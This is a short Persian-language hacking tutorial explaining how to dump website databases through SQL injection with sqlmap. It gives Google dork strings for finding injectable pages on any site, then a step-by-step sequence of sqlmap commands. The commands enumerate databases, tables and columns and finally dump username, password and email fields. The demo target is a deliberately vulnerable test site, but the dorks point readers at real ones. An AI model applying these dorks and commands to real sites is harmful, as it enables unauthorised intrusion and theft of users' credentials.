آموزش دامپ دیتابیس سایت ها با باگ Sql Injection با کمک ابذار Sqlmap
در قدم اول یک سایت که دارایی باگ sql داره را پیدا کنید(میتوانید از دورک های زیر استفاده کنید)
inurl:news.php?id=
inurl:pages.php?id=
inurl:post.php?id=
inurl:events.php?id=
inurl:details.php?id=
inurl:blog.php?id=
inurl:show.php?id=
تارگتی که بنده در این آموزش استفاده میکنم
http://testphp.vulnweb.com/listproducts.php?cat=1'
(سپس یک ترمینال را بازکنید(با دستور زیر دیتابیس سایت را بیرون بکشید
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 —dbs
سپس دیتابیس های سایت رو به ما در اخر نشون میده بعدش با دستور زیر جدول های دیتادیس مورد نظر خودمونو بدست میاریم
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D نام دیتابیس —tables
مثلا ما فرض رو به این میگیریم یه تیبل به ما نشون میده و اسمش هم یوزر هستش با دستور زیر ستون های دیتابیس رو بدست میاریم
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D dbname -T users —columns
فرض میکنیم که سه تا ستون زیر رو نشون میده
username
password
در نهایت با دستور زیر دیتای ستون هارو بدست میاریم
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D dbname -T users -C username password email —dump
دیتابیس شما با موفقیت دامپ شد
ومن الله توفیق
منبع: Hijack.blog.ir
